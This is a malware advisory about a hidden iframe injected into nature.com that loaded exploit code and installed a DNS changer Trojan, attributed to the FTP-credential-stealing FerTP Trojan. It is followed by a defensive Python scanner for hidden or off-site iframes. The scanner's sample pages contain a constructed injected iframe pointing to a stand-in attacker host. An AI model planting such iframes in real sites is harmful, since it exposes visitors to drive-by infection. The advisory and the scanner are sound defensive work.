Malicious iFrame Detected on
Beginning May 10th, a malicious iframe was detected on the nature.com website. The iframe loads malicious exploit code from a path on the money2008.org domain. On susceptible systems, the exploit results in the installation of a DNS changer Trojan. A DNS changer Trojan can be used to forcibly – and surreptitiously – redirect victims to sites other than the ones they expected. For example, a user attempting to access their online banking site may be directed to a look-alike site that captures their banking credentials when they attempt to log in to what they believe to be the legitimate site. The injected iframe would not be readily visible to visitors of the nature.com website, which continued to display normally, as seen in the screenshot below.
However, the script for the hidden iframe is apparent when examining the site’s source code, as seen in the screenshot below. Note that the malicious script has since been removed from the nature.com website.
The particular iframe is consistent with an iframe appended to sites via the FerTP Trojan. FerTP is a backdoor / password stealing Trojan that harvests FTP login credentials and sends those credentials to a remote attacker. The Trojan also logs into the sites using those same FTP credentials, searching for specific types of web pages and appending the malicious iframe to each one found. The targeted pages are index.htm*, index.php, main.htm*, main.php, default.htm, and default.php.
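The following is an added example, not code from the original report: a small defender-side scanner that implements the check a site owner would want after reading the description above. It walks a set of pages, restricts attention to the file names the report says FerTP targets (index.htm*, index.php, main.htm*, main.php, default.htm, default.php), and flags any iframe that is hidden (display:none, visibility:hidden, or zero/one-pixel dimensions) or that points off-site. The sample pages, the site host `www.example.org` and the off-site host `attacker.example` are constructed for illustration; the function names are this example's own.

```python
import fnmatch
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Page names the report says the Trojan appends its iframe to.
# fnmatch treats "index.htm*" as matching both index.htm and index.html.
TARGET_PATTERNS = ("index.htm*", "index.php", "main.htm*", "main.php",
                   "default.htm", "default.php")


def is_targeted_page(filename):
    """True if the file name is one of the page types FerTP is known to modify."""
    name = filename.lower()
    return any(fnmatch.fnmatch(name, p) for p in TARGET_PATTERNS)


class IframeCollector(HTMLParser):
    """Collects the attributes of every <iframe> start tag in a document."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            # html.parser gives None for bare attributes; normalise to "".
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def _tiny(value):
    """Dimension of 0 or 1 (optionally with a px suffix) counts as hidden."""
    m = re.fullmatch(r"(\d+)(px)?", value.strip().lower())
    return bool(m) and int(m.group(1)) <= 1


def is_hidden(attrs):
    """Hidden iframes are the hallmark of an injected loader, not of site content."""
    style = attrs.get("style", "").replace(" ", "").lower()
    return ("display:none" in style or "visibility:hidden" in style
            or _tiny(attrs.get("width", "")) or _tiny(attrs.get("height", "")))


def find_suspicious_iframes(html, site_host):
    """Return iframes that are hidden or whose src host is outside site_host."""
    collector = IframeCollector()
    collector.feed(html)
    findings = []
    for attrs in collector.iframes:
        src = attrs.get("src", "")
        host = urlparse(src).hostname or ""      # relative src -> "" (same site)
        offsite = bool(host) and host != site_host and not host.endswith("." + site_host)
        hidden = is_hidden(attrs)
        if offsite or hidden:
            findings.append({"src": src, "offsite": offsite, "hidden": hidden})
    return findings


def scan_site(pages, site_host):
    """Map targeted page name -> list of suspicious iframes found in it."""
    report = {}
    for name, html in pages.items():
        if not is_targeted_page(name):
            continue
        hits = find_suspicious_iframes(html, site_host)
        if hits:
            report[name] = hits
    return report


# Constructed sample site: one targeted page with an injected hidden, off-site
# iframe; one non-targeted page; one targeted page with a legitimate embed.
SAMPLE_PAGES = {
    "index.html": ("<html><body><h1>Welcome</h1>"
                   '<iframe src="http://attacker.example/loader.html" '
                   'width="0" height="0" style="display:none"></iframe>'
                   "</body></html>"),
    "about.html": ('<html><body><iframe src="http://attacker.example/x" '
                   'width="0" height="0"></iframe></body></html>'),
    "main.php": ('<html><body><iframe src="/video/player.php" width="640" '
                 'height="360"></iframe></body></html>'),
}

if __name__ == "__main__":
    for page, hits in scan_site(SAMPLE_PAGES, "www.example.org").items():
        for h in hits:
            print(f"{page}: iframe src={h['src']!r} offsite={h['offsite']} hidden={h['hidden']}")
```

In practice the `pages` mapping would be built by reading the files under the web root, and the scan would be run from a known-clean host, since the report's point is that the attacker already holds valid FTP credentials for the compromised site; rotating those credentials is the accompanying remediation step.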
This report was completed by: Mary Landesman